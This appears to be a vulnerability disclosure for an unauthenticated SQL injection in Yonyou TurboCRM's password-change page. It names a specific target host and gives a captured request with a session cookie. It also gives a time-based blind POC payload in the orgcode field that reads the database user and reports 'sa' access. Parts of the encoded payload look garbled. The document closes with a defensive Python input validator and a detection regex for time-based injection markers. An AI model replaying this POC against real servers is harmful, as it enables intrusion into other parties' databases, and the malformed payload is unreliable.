Yonyou CRM SQL Injection Vulnerability (no login required, affects all versions)
A SQL injection in Yonyou (UFIDA) TurboCRM can be exploited without logging in and affects all versions.
Yonyou TurboCRM has a generic SQL injection in its password-change page.
http://crm.varsal.com.cn:8081/login.php
Locate the password-retrieval (change password) page and open:
http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system
Capture the request sent when the form is submitted:
POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1
Host: crm.varsal.com.cn:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system
Content-Length: 95
Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1
Injection technique: time-based blind. Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
POC:
POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1
Accept-language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Host: crm.varsal.com.cn:8081
Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system
Pragma: no-cache
Cache-control: no-cache
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1
Content-length: 276
Connection: close

submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1%27%20IF28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28SYSTEM_USER%20AS%20NVARCHAR284000%29%29%2CCHAR%2832%29%29%29%2C3%2C1%29%29%3E1%29%20WAITFOR%20DELAY%20%2703A0%3A1%27--&loginname=system&key=-1
Result: the query runs as the database user sa.
Solution:
Filter the user-supplied parameters (orgcode, loginname) before they reach the SQL query.
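As an added example, not the vendor's code, here is the input filter the solution calls for, written in Python for the two parameters the POC abuses; it assumes the field names from the captured request above, rejects any orgcode that is not a plain integer, and flags time-based injection markers so the same check can be run over logged request bodies. Parameterising the underlying query remains the primary fix; this check sits in front of it as defence in depth.

```python
import re
from urllib.parse import parse_qs

# Constructed sample bodies (not captured traffic): a benign change-password
# submission and one carrying an MSSQL time-based payload in orgcode.
BENIGN_BODY = ("submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa"
               "&orgcode=1&loginname=system&key=-1")
SUSPECT_BODY = ("submit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa"
                "&orgcode=1%27%20IF%281%3E0%29%20WAITFOR%20DELAY%20%270%3A0%3A1%27--"
                "&loginname=system&key=-1")

# Markers of time-based blind injection, matched against the decoded values.
TIME_BASED = re.compile(r"waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\(|\bsleep\s*\(", re.I)

# Whitelists: orgcode is an integer id, loginname a short account token.
ORGCODE_RE = re.compile(r"[0-9]{1,9}")
LOGINNAME_RE = re.compile(r"[A-Za-z0-9_.\-]{1,64}")


def validate_changepswd(body: str) -> dict:
    """Validate the changepswd.php form fields before they reach any SQL.

    parse_qs performs the single URL-decoding step, so the checks run on the
    same value the application would use. Returns ok/errors plus a
    time_based flag suitable for raising an alert from a request log.
    """
    fields = parse_qs(body, keep_blank_values=True)
    orgcode = fields.get("orgcode", [""])[0]
    loginname = fields.get("loginname", [""])[0]
    errors = []
    if not ORGCODE_RE.fullmatch(orgcode):
        errors.append("orgcode is not a decimal integer")
    if not LOGINNAME_RE.fullmatch(loginname):
        errors.append("loginname contains characters outside the allowed set")
    time_based = bool(TIME_BASED.search(orgcode + " " + loginname))
    return {"ok": not errors, "errors": errors, "time_based": time_based}


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        print(label, validate_changepswd(body))
```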